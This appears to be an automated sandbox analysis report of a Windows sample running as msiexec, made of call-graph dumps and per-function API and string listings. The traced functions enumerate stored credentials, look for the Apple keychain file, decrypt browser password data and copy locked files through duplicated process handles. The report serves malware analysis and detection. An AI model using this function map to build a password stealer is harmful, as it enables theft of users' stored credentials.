40aebe FindClose 38649->38651 38650 40add4 2 API calls 38650->38653 38652 4453fe 38651->38652 38652->38346 38653->38648 38653->38649 38653->38650 38654 445403 250 API calls 38653->38654 38654->38653 38656 40ae7b FindNextFileW 38655->38656 38657 40ae5c FindFirstFileW 38655->38657 38658 40ae94 38656->38658 38659 40ae8f 38656->38659 38657->38658 38661 40aeb6 
38658->38661 38662 409d1f 6 API calls 38658->38662 38660 40aebe FindClose 38659->38660 38660->38658 38661->38346 38662->38661 38663->38230 38664->38210 38665->38299 38666->38287 38667->38287 38668->38318 38670 409c89 38669->38670 38670->38337 38671->38369 38673 413d39 38672->38673 38674 413d2f FreeLibrary 38672->38674 38675 40b633 free 38673->38675 38674->38673 38676 413d42 38675->38676 38677 40b633 free 38676->38677 38678 413d4a 38677->38678 38678->38271 38679->38206 38680->38196 38681->38273 38683 44db70 38682->38683 38684 40b6fc memset 38683->38684 38685 409c70 2 API calls 38684->38685 38686 40b732 wcsrchr 38685->38686 38687 40b743 38686->38687 38688 40b746 memset 38686->38688 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 40b76f 38689->38690 38691 409d1f 6 API calls 38690->38691 38692 40b783 38691->38692 39487 409b98 GetFileAttributesW 38692->39487 38694 40b7c2 39488 40bb98 38694->39488 38695 40b792 38695->38694 38696 409c70 2 API calls 38695->38696 38698 40b7a5 38696->38698 38700 40b2cc 27 API calls 38698->38700 38703 40b7b2 38700->38703 38701 40b837 CloseHandle 38705 40b83e memset 38701->38705 38702 40b817 39522 409a45 GetTempPathW 38702->39522 38707 409d1f 6 API calls 38703->38707 39521 40a6e6 WideCharToMultiByte 38705->39521 38707->38694 38708 40b827 38708->38705 38709 40b866 38710 444432 120 API calls 38709->38710 38711 40b879 38710->38711 38712 40bad5 38711->38712 38713 40b273 27 API calls 38711->38713 38715 40b04b ??3@YAXPAX 38712->38715 38714 40b89a 38713->38714 38716 438552 133 API calls 38714->38716 38717 40baf3 38715->38717 38718 40b8a4 38716->38718 38717->38198 38719 40bacd 38718->38719 38721 4251c4 136 API calls 38718->38721 38720 443d90 110 API calls 38719->38720 38720->38712 38743 40b8b8 38721->38743 38722 40bac6 39534 424f26 122 API calls 38722->39534 38723 40b8bd memset 39525 425413 17 API calls 38723->39525 38726 425413 17 API calls 38726->38743 38729 40a71b MultiByteToWideChar 38729->38743 38732 40b9b5 memcmp 38732->38743 38733 
4099c6 2 API calls 38733->38743 38734 404423 37 API calls 38734->38743 38736 4251c4 136 API calls 38736->38743 38737 40bb3e memset memcpy 39535 40a734 MultiByteToWideChar 38737->39535 38740 40bb88 LocalFree 38740->38743 38743->38722 38743->38723 38743->38726 38743->38729 38743->38732 38743->38733 38743->38734 38743->38736 38743->38737 38744 40ba5f memcmp 38743->38744 38745 40a734 MultiByteToWideChar 38743->38745 39526 4253ef 16 API calls 38743->39526 39527 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38743->39527 39528 4253af 17 API calls 38743->39528 39529 4253cf 17 API calls 38743->39529 39530 447280 memset 38743->39530 39531 447960 memset memcpy memcpy memcpy 38743->39531 39532 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38743->39532 39533 447920 memcpy memcpy memcpy 38743->39533 38744->38743 38745->38743 38746->38276 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38213 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39624 409b98 GetFileAttributesW 38757->39624 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39625 409b98 GetFileAttributesW 38765->39625 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38285 38769->38768 38770->38284 38771->38309 38772->38311 38773->38349 38774->38330 38775->38376 38776->38376 38777->38359 38778->38388 38779->38390 38780->38392 38782 414c2e 14 API calls 38781->38782 38783 40c2ae 38782->38783 38837 40c1d3 38783->38837 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 
40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38953 40a97a 38805->38953 38808 40a8cc 38808->38399 38959 40b1ab free free 38810->38959 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38815 40c50e 38814->38815 38816 40c3ff 38814->38816 38830 405337 38815->38830 38817 40a9ce 4 API calls 38816->38817 38818 40c418 memset 38817->38818 38960 40aa1d 38818->38960 38821 40c471 38823 40c47a _wcsupr 38821->38823 38822 40c505 38822->38815 38962 40a8d0 7 API calls 38823->38962 38825 40c498 38963 40a8d0 7 API calls 38825->38963 38827 40c4ac memset 38828 40aa1d 38827->38828 38829 40c4e4 RegEnumValueW 38828->38829 38829->38822 38829->38823 38964 405220 38830->38964 38833->38410 38834->38412 38835->38413 38836->38406 38838 40ae18 9 API calls 38837->38838 38844 40c210 38838->38844 38839 40ae51 9 API calls 38839->38844 38840 40c264 38841 40aebe FindClose 38840->38841 38843 40c26f 38841->38843 38842 40add4 2 API calls 38842->38844 38849 40e5ed memset memset 38843->38849 38844->38839 38844->38840 38844->38842 38845 40c231 _wcsicmp 38844->38845 38846 40c1d3 34 API calls 38844->38846 38845->38844 38847 40c248 38845->38847 38846->38844 38862 40c084 21 API calls 38847->38862 38850 414c2e 14 API calls 38849->38850 38851 40e63f 38850->38851 38852 409d1f 6 API calls 38851->38852 38853 40e658 38852->38853 38863 409b98 GetFileAttributesW 38853->38863 38855 40e667 38856 409d1f 6 API calls 38855->38856 38858 40e680 38855->38858 38856->38858 38864 409b98 GetFileAttributesW 38858->38864 38859 40e68f 38860 40c2d8 38859->38860 38865 

Control-flow Graph (graph image omitted)
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509

Control-flow Graph (graph image omitted)
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 1344430650-1740548384
APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph figure for the function at 44553b (basic blocks 44553b-445fb2, executed/not-executed colouring); rendered graph data not reproduced]
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 2263259095-3798722523
• Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
• Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

Control-flow Graph

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
• SetErrorMode.KERNELBASE(00008001), ref: 00412799
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030
• Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
• Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
• CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 4290143792-2783969131
• Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
• Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
• Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
• Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph figure for the function at 40e2ab (basic blocks 40e2ab-40e4af, executed/not-executed colouring); rendered graph data not reproduced]
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                • API String ID: 3849927982-2252543386
                                                                                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                Control-flow Graph

                                                                                                                                                 • Control-flow graph of the function at 004091B8 (rendered graph image not preserved in this text export)
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                • String ID: bhv
                                                                                                                                                • API String ID: 4234240956-2689659898
                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                Control-flow Graph

                                                                                                                                                 • Control-flow graph of the function at 00413F4F (rendered graph image not preserved in this text export)
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
